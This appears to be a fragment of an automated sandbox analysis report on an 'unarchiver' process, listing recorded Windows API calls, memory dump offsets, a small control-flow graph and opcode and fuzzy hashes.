                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectory
                                                          • String ID:
                                                          • API String ID: 4241100979-0
                                                          • Opcode ID: d0f694f52b5c12cb2eb602a6e330ba63215e0aa1c37b45962f068f2ebb3884b5
                                                          • Instruction ID: 816238b7a69483b2308171536e28576af50b10e8b0a5bd464394469f41512acf
                                                          • Opcode Fuzzy Hash: d0f694f52b5c12cb2eb602a6e330ba63215e0aa1c37b45962f068f2ebb3884b5
                                                          • Instruction Fuzzy Hash: BA21B0B25093C05FEB12CB29DC55B92BFE8AF06314F0D84EAE984CB153D325D909CB61

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 165 131a392-131a3cf 167 131a3d1 165->167 168 131a3d4-131a3dd 165->168 167->168 169 131a3e2-131a3e8 168->169 170 131a3df 168->170 171 131a3ea 169->171 172 131a3ed-131a404 169->172 170->169 171->172 174 131a406-131a419 RegQueryValueExW 172->174 175 131a43b-131a440 172->175 176 131a442-131a447 174->176 177 131a41b-131a438 174->177 175->174 176->177
                                                          APIs
                                                          • RegQueryValueExW.KERNELBASE(?,00000E24,4E46DEC3,00000000,00000000,00000000,00000000), ref: 0131A40C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: QueryValue
                                                          • String ID:
                                                          • API String ID: 3660427363-0
                                                          • Opcode ID: 4f3b8663ada584a82ff602ff423ed95bcf2a9d788dea16278f5478185f58e819
                                                          • Instruction ID: 86bf3660ae5fe677d6c831e8be75f2ff5ae158bd5c41962bbd94c6e6cc0a0a3e
                                                          • Opcode Fuzzy Hash: 4f3b8663ada584a82ff602ff423ed95bcf2a9d788dea16278f5478185f58e819
                                                          • Instruction Fuzzy Hash: 7421C0B1100644AFE720CF25DC89FA7FBECEF04614F04845AEA469B252D764E908CA71
                                                          APIs
                                                          • WriteFile.KERNELBASE(?,00000E24,4E46DEC3,00000000,00000000,00000000,00000000), ref: 0131A9C1
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: c1d5ed4320221568ac6a919d270dc8d2ffe009fb408a462b1e75bf56ec6dff6b
                                                          • Instruction ID: 0800e43c316b46fde1d41582796aa8c056e76bd293d270812a8eb918e1e96103
                                                          • Opcode Fuzzy Hash: c1d5ed4320221568ac6a919d270dc8d2ffe009fb408a462b1e75bf56ec6dff6b
                                                          • Instruction Fuzzy Hash: 4F11E775400244AFEB21CF65DD45F67FBE8EF04724F04845AEA458B252C379A544CBB1
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(?,00000E24,4E46DEC3,00000000,00000000,00000000,00000000), ref: 0131A8DE
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: 42d36713da32ddfda34497982e83ace6002b264f527178f76aa4f7bc79afce6a
                                                          • Instruction ID: 51d9c88a908f63190dc87ecbbe849f6de59ba66f4c9879df0d154326e7e6ba76
                                                          • Opcode Fuzzy Hash: 42d36713da32ddfda34497982e83ace6002b264f527178f76aa4f7bc79afce6a
                                                          • Instruction Fuzzy Hash: ED11E3B5400244AFEB21CF65DD45F66FBE8EF44724F04849AEE498B246C378A5448BB2
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(?), ref: 0131A30C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 218016aa9aa36aa4f251b3c23dcc7e855b0db44d5eae8758afbd727a3f89f993
                                                          • Instruction ID: b0fbd61d2fb1927cd968180b7ff306e2204f140d872efbae2d3e3270f24f52e8
                                                          • Opcode Fuzzy Hash: 218016aa9aa36aa4f251b3c23dcc7e855b0db44d5eae8758afbd727a3f89f993
                                                          • Instruction Fuzzy Hash: 7611A3754097C09FD7238B25DC54A52BFB4DF07225F0984DBDD848F263D265A909CB72
                                                          APIs
                                                          • GetSystemInfo.KERNELBASE(?), ref: 0131B208
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: InfoSystem
                                                          • String ID:
                                                          • API String ID: 31276548-0
                                                          • Opcode ID: cd68807bd258e3e219d511b02061351cb2eb3e9be3d862e8518cc15ceca0adfb
                                                          • Instruction ID: 09afc68c3215331280ad9057eb252c675e681aabd6dc2666c25f8a52a92bd4c7
                                                          • Opcode Fuzzy Hash: cd68807bd258e3e219d511b02061351cb2eb3e9be3d862e8518cc15ceca0adfb
                                                          • Instruction Fuzzy Hash: 2B1170714093809FDB128F15DC94B56FFB4DF46224F0884EAED848F257D275A908CB72
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: CloseFind
                                                          • String ID:
                                                          • API String ID: 1863332320-0
                                                          • Opcode ID: 99e095f59e92fde4326a112f475632617e0e78051aebb9931f3cc22698a6ead5
                                                          • Instruction ID: 4b62faaef390b113df80a303f08660320a1c72ddebee492278970fee3dbe4e1b
                                                          • Opcode Fuzzy Hash: 99e095f59e92fde4326a112f475632617e0e78051aebb9931f3cc22698a6ead5
                                                          • Instruction Fuzzy Hash: B011A0715097C09FD7128B25DC85A52FFF4EF06220F0984DBED858B263D378A908DB62
                                                          APIs
                                                          • GetFileType.KERNELBASE(?,00000E24,4E46DEC3,00000000,00000000,00000000,00000000), ref: 0131A815
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID:
                                                          • API String ID: 3081899298-0
                                                          • Opcode ID: 1082aefc96b61e71ae841d50dc41fa69e8f3a5f08f79190621b34fcf9af63487
                                                          • Instruction ID: 23d00e32cf1c5779fa66045e1d954bcc13b1fc0ef18dfcaae71ebdedaaba0567
                                                          • Opcode Fuzzy Hash: 1082aefc96b61e71ae841d50dc41fa69e8f3a5f08f79190621b34fcf9af63487
                                                          • Instruction Fuzzy Hash: 5F01D271500244AEE720CB25DD85BA6FFECDF44729F04C096EE458B246D378A9448AB6
                                                          APIs
                                                          • CreateDirectoryW.KERNELBASE(?,?), ref: 0131AA8B
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectory
                                                          • String ID:
                                                          • API String ID: 4241100979-0
                                                          • Opcode ID: ad295a98064cfe95fcfb79aed1dfc8a5469a957f11f448a8ee41cdf76f6f3f8f
                                                          • Instruction ID: b1c7f94af596a9edefcb40111c5c4166445206f75f7d5a2089436b5a1aaf4925
                                                          • Opcode Fuzzy Hash: ad295a98064cfe95fcfb79aed1dfc8a5469a957f11f448a8ee41cdf76f6f3f8f
                                                          • Instruction Fuzzy Hash: B611C4726012809FFB14CF69D985B56FBD8EF04625F08C4AADD09CB246E375E504CF61
                                                          APIs
                                                          • FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 0131A1C2
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: FileFindNext
                                                          • String ID:
                                                          • API String ID: 2029273394-0
                                                          • Opcode ID: a0129a44e7ac65ede1af83e26d84cd1d8906a322f0946009c2b2867a769bd60c
                                                          • Instruction ID: 32b35e7d04f8b78da8285cf0db1464a2be023feff25d1893cba770cd9bff84c5
                                                          • Opcode Fuzzy Hash: a0129a44e7ac65ede1af83e26d84cd1d8906a322f0946009c2b2867a769bd60c
                                                          • Instruction Fuzzy Hash: E0017171500200ABD310DF26DD86B26FBE8EB88B20F14855AED089B741D735F915CBE5
                                                          APIs
                                                          • CreatePipe.KERNELBASE(?,00000E24,?,?), ref: 0131AC36
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: CreatePipe
                                                          • String ID:
                                                          • API String ID: 2719314638-0
                                                          • Opcode ID: 850cc17e3d9f1d0a88a850c37c0432e22282b0c034e1b392946e015cb4389db1
                                                          • Instruction ID: 0abe1d447f6bbe1e2ae6e4d0c57bb5bedaaee31248ed502095123d5b202de39f
                                                          • Opcode Fuzzy Hash: 850cc17e3d9f1d0a88a850c37c0432e22282b0c034e1b392946e015cb4389db1
                                                          • Instruction Fuzzy Hash: 7C017171500200ABD310DF26DD86B26FBE8FB88B20F14855AED089B741D735F915CBE5
                                                          APIs
                                                          • GetTempPathW.KERNELBASE(?,00000E24,?,?), ref: 0131A5B6
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: PathTemp
                                                          • String ID:
                                                          • API String ID: 2920410445-0
                                                          • Opcode ID: 135f8dc8076a17cd235683b2982ac79fdf4711c431d11e7760116f2804ddd9ce
                                                          • Instruction ID: 84a78c7c22ad5468bdb2fb8379c47ac2bf13e61f20cf6cdf00441eb55cf3d169
                                                          • Opcode Fuzzy Hash: 135f8dc8076a17cd235683b2982ac79fdf4711c431d11e7760116f2804ddd9ce
                                                          • Instruction Fuzzy Hash: 90018671500600ABD310DF16DD86B26FBE8FB88B20F14815AED085B741D775FA15CBE5
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: CloseFind
                                                          • String ID:
                                                          • API String ID: 1863332320-0
                                                          • Opcode ID: bddfea0eb7fddd93dde2d359f122668f542d66e26a06984028ef421f315dc16b
                                                          • Instruction ID: 0e84686664da18b144cea87dfc16122d9ce1b2a6da7f77593c9865fc60628c9b
                                                          • Opcode Fuzzy Hash: bddfea0eb7fddd93dde2d359f122668f542d66e26a06984028ef421f315dc16b
                                                          • Instruction Fuzzy Hash: FC01F4B55006449FDB148F29DC85762FBE4EF04225F08C0AADD098B796D379E948CEA2
                                                          APIs
                                                          • GetSystemInfo.KERNELBASE(?), ref: 0131B208
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: InfoSystem
                                                          • String ID:
                                                          • API String ID: 31276548-0
                                                          • Opcode ID: d91836ed7668a11bd7f2ce4129200b1d3771f3e94b73486524932e6db9e815b9
                                                          • Instruction ID: 531bc42b68283d6b2d00e55343118b0fcd046e9b400e948524613aaf748e80c6
                                                          • Opcode Fuzzy Hash: d91836ed7668a11bd7f2ce4129200b1d3771f3e94b73486524932e6db9e815b9
                                                          • Instruction Fuzzy Hash: 7901AD708002449FDB10DF55E985BAAFBE4EF05724F08C4AADD488F25AD379A508CBA2
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(?), ref: 0131A30C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: e1677be946f6cd8810fb7de366713f9c551d7864fd9319c4bcee022a3be05842
                                                          • Instruction ID: c8d553d501d321e5bd07d18c0eeae973280f476bc425ba3606959ac3b142ece3
                                                          • Opcode Fuzzy Hash: e1677be946f6cd8810fb7de366713f9c551d7864fd9319c4bcee022a3be05842
                                                          • Instruction Fuzzy Hash: CEF02270404284CFDB20CF15D885722FBE4EF04725F08C49ACD080F356D3B9A504CEA2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2151249138.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_1640000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: [M1
                                                          • API String ID: 0-1606414677
                                                          • Opcode ID: 007f8b81e3636407f623e561ebea7d1ec74f750ee09d042f68ca43574857a727
                                                          • Instruction ID: 579e4d46a5d9416ecfaab7149fe6096da1065d98f37f8ef5d8fe483cf2e9c246
                                                          • Opcode Fuzzy Hash: 007f8b81e3636407f623e561ebea7d1ec74f750ee09d042f68ca43574857a727
                                                          • Instruction Fuzzy Hash: 8921E434B042548FCB15AB3A88446AF7BE69FC6208B55847CD585DB352DF399D028791
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2151249138.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_1640000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: [M1
                                                          • API String ID: 0-1606414677
                                                          • Opcode ID: e08c0ff8849788be0f9c2d570ee1bbc6e6e95343dc17e27d50360aa345d91566
                                                          • Instruction ID: eb4e3a8014260edfd6db4ae5fcabb7b4878ee024fcfb3b2e61f8478d13ac5dfd
                                                          • Opcode Fuzzy Hash: e08c0ff8849788be0f9c2d570ee1bbc6e6e95343dc17e27d50360aa345d91566
                                                          • Instruction Fuzzy Hash: 6321E430B002148BCB14EB3A884466FBBD69FC5208B55843CD5959B345DF79E90687D5
                                                          APIs
                                                          • CloseHandle.KERNELBASE(?), ref: 0131A748
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: e80ade33fc50da981c542fbf1677dbfeeb5017d3f784c67bea466467c2a42053
                                                          • Instruction ID: 55c5b5ec1e53e5a50fcaff84c31dcf5280dae42af114f7422c2d3d16732ec47c
                                                          • Opcode Fuzzy Hash: e80ade33fc50da981c542fbf1677dbfeeb5017d3f784c67bea466467c2a42053
                                                          • Instruction Fuzzy Hash: 292180B59097C05FD7128B25DC95792BFB4EF06324F0984DADC858B5A3D2249909C772
                                                          APIs
                                                          • CloseHandle.KERNELBASE(?), ref: 0131A748
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: fa5ec19ccdc686ed136a59f34375f7cf350c54aecbf7d224bca38d86389fe34a
                                                          • Instruction ID: 9060148bced9a310e8458249f40a534851859999af7fc6fc2f229da2272ea2a1
                                                          • Opcode Fuzzy Hash: fa5ec19ccdc686ed136a59f34375f7cf350c54aecbf7d224bca38d86389fe34a
                                                          • Instruction Fuzzy Hash: 9401F7745012408FDB10CF65E985756FBE4DF00325F08C4AADC0A8F646D379E544CFA2
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2151249138.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_1640000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 527e9d5ca99ad52b899b79d8370481b89cf38137e9399a79f9fb408a0f6ded23
                                                          • Instruction ID: 52e4c9efb80dc42f6eda21343146ef5795cb663c8682a6124dd0f473341a3a82
                                                          • Opcode Fuzzy Hash: 527e9d5ca99ad52b899b79d8370481b89cf38137e9399a79f9fb408a0f6ded23
                                                          • Instruction Fuzzy Hash: 55B10034A01210DFC728DF64E958A5A7BB6FF88344B21817DEA06A7756DB7C9C01CFA1
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2151249138.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_1640000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5700859621162aeea71a63ff29b776fcb776523c2d9da26e52b56e0a24775f89
                                                          • Instruction ID: f326c4be534f2d583eb134937567b245e04628371f4f9049e0e4174b95c0a818
                                                          • Opcode Fuzzy Hash: 5700859621162aeea71a63ff29b776fcb776523c2d9da26e52b56e0a24775f89
                                                          • Instruction Fuzzy Hash: 4DA15B30B00215CBDB19AFB4D85576E77A6FBC8308F158069EA06A7395DF7C8C42CBA1
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2151249138.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_1640000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 807944b3c046f6a6892d0f1d59da713f6ed70363e7ca22ac0b3d7c915aa49bab
                                                          • Instruction ID: b05a6629326bde69528b53e892f361960b5e48ed8462ec0aeff0466829d3eea1
                                                          • Opcode Fuzzy Hash: 807944b3c046f6a6892d0f1d59da713f6ed70363e7ca22ac0b3d7c915aa49bab
                                                          • Instruction Fuzzy Hash: 77115132A10218AFCB149BB4D84899E7BF6FFCD214B064479E606E7271EF359C058791
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2151196478.0000000001490000.00000040.00000020.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_1490000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 74492a061a9d3c33f020e34405d5e05c85b9c39c37104a9d4992a3d9ae4958b7
                                                          • Instruction ID: fdb95d252004a4db823ec2e38c15ad912d656939cbe18906c0ba2ba44b8c0c8a
                                                          • Opcode Fuzzy Hash: 74492a061a9d3c33f020e34405d5e05c85b9c39c37104a9d4992a3d9ae4958b7
                                                          • Instruction Fuzzy Hash: 460175B140D3806FC701DB15AC45C67BFFCDE86524B0885AEF8448B612D265A9188BB2
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2151196478.0000000001490000.00000040.00000020.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_1490000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0492226e26eee9d162099c9cd921214d54d809901a9ede7e66bf950444893a77
                                                          • Instruction ID: 7e97d4ae279e505faf895c8bd94757edb597e1160099d4599077ce5ae9348b82
                                                          • Opcode Fuzzy Hash: 0492226e26eee9d162099c9cd921214d54d809901a9ede7e66bf950444893a77
                                                          • Instruction Fuzzy Hash: 0301A4B65097806FC7118F16EC41893BFE8DF8663071984ABE849CB252D239B909CB72
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2151196478.0000000001490000.00000040.00000020.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_1490000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8597c22dc299be4e7407d167144d9f5372b2d7933bdda59850fbe30622472d4f
                                                          • Instruction ID: d68a680aa82de9660b37782f8af77d2d24bf4fc3ef45158620963a4d35e8cfca
                                                          • Opcode Fuzzy Hash: 8597c22dc299be4e7407d167144d9f5372b2d7933bdda59850fbe30622472d4f
                                                          • Instruction Fuzzy Hash: FEF082B29056046B9200DF55ED46856F7ECDF84521F04C56AEC088B300E27AAA154AF2
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2151196478.0000000001490000.00000040.00000020.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_1490000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b3b61ce5c8f6fd9b3782714188843fb29a5365181178049bac1bf7c672956ea7
                                                          • Instruction ID: b113b13db3180f68f1d99ae9b037875b9b5e494f975f20f1282fbf1d3c2761cd
                                                          • Opcode Fuzzy Hash: b3b61ce5c8f6fd9b3782714188843fb29a5365181178049bac1bf7c672956ea7
                                                          • Instruction Fuzzy Hash: 62E012B66046045B9650DF0AFC41452F7D8EB88631718C47FDC1D8B711D679B505CBA5
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2151249138.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_1640000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4bb00d331a07e6b6e8dfdf47e93b54c9abec3f80ae2ef115b8e926b44b8ba8fb
                                                          • Instruction ID: ba7a0c7ed3142299aba09991aca6507bf6ca38976dd23adedbedfdb1758a1436
                                                          • Opcode Fuzzy Hash: 4bb00d331a07e6b6e8dfdf47e93b54c9abec3f80ae2ef115b8e926b44b8ba8fb
                                                          • Instruction Fuzzy Hash: F7E0DF31F142942FCB44EBB858542EE7FF2DB86254B5684B9C009CB342EE39CE038390
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2151249138.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_1640000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 80ffdbad77fc4ed2005857cad1a69cf02bbdf9d648af436dbdf2451a29656831
                                                          • Instruction ID: f41d45c1e7b97b96407977493549d3b9ada72c4c1a420410bb6ef6d2bc5432f0
                                                          • Opcode Fuzzy Hash: 80ffdbad77fc4ed2005857cad1a69cf02bbdf9d648af436dbdf2451a29656831
                                                          • Instruction Fuzzy Hash: 03D01231F042182B8B48DBB958546AE7BEA9BC4154B564479D109D7341FE359D418790
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2151249138.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_1640000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7207e0ce14ac27ed39be5ae91e40421db1c8a7692d1033e9aad392acfa91dd40
                                                          • Instruction ID: 3a8775c5509be526c713fbe28cb0a131e01acb9684ad491d00e513495e213d25
                                                          • Opcode Fuzzy Hash: 7207e0ce14ac27ed39be5ae91e40421db1c8a7692d1033e9aad392acfa91dd40
                                                          • Instruction Fuzzy Hash: EFE086345483905FCB074B3498145E57FB15FD3218F1980DDD9848F663C6258851D780
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2151249138.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_1640000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4a4909ecc2b8432961a8e64090f738b35eb53f26549194e5728e3bd5b1ec0f1a
                                                          • Instruction ID: 15e8d1168f8e8695774a790d78182e0b2e21639f85b0a972f54f185b5c0b42b7
                                                          • Opcode Fuzzy Hash: 4a4909ecc2b8432961a8e64090f738b35eb53f26549194e5728e3bd5b1ec0f1a
                                                          • Instruction Fuzzy Hash: F7E0C2242193C04FC70257349C245A83F616F9B204F4980D9CA844F373C739D812D750
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150651956.0000000001312000.00000040.00000800.00020000.00000000.sdmp, Offset: 01312000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_1312000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 849a23bccb3ef5a4e46a3f7f3a1b7f3123baa49f077c0768d0e7bbe07902a55c
                                                          • Instruction ID: 58a3ee60e6f20285f748b733e29ee6426b38c8e674915d813a45f071ae093053
                                                          • Opcode Fuzzy Hash: 849a23bccb3ef5a4e46a3f7f3a1b7f3123baa49f077c0768d0e7bbe07902a55c
                                                          • Instruction Fuzzy Hash: 4CD02EB92406804FE31A8E1CC1A4B863BE8AB40708F0A00F9E8008B367CB28E481C200
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150651956.0000000001312000.00000040.00000800.00020000.00000000.sdmp, Offset: 01312000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_1312000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3946bdcfc17f0128af80d81cd31f080e5d7977ab9970a84dde28e6b7cfc30e69
                                                          • Instruction ID: abb17c674703684666443ec24ce9d8951a5ca4a9d17f8b6caa2ad2fd4f106b12
                                                          • Opcode Fuzzy Hash: 3946bdcfc17f0128af80d81cd31f080e5d7977ab9970a84dde28e6b7cfc30e69
                                                          • Instruction Fuzzy Hash: A8D05E342002814FDB19DE1CC6D4F5A37D8AB40718F2A48E8AC108B266C7A8D8C1DA00
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2151249138.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_1640000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 08045cd33b875f411622025a5c8d822bde10a955bfa416a09262daa363f5c849
                                                          • Instruction ID: 787ccb1a220bdf211e69352d879dea295facbff4d11f55dd9a1c2d9e0d74d5d8
                                                          • Opcode Fuzzy Hash: 08045cd33b875f411622025a5c8d822bde10a955bfa416a09262daa363f5c849
                                                          • Instruction Fuzzy Hash: 35C012302002248FD714AB68DC18A6577966BD0608F49C06896080B361DF74EC50C6C4
                                                          Memory Dump Source
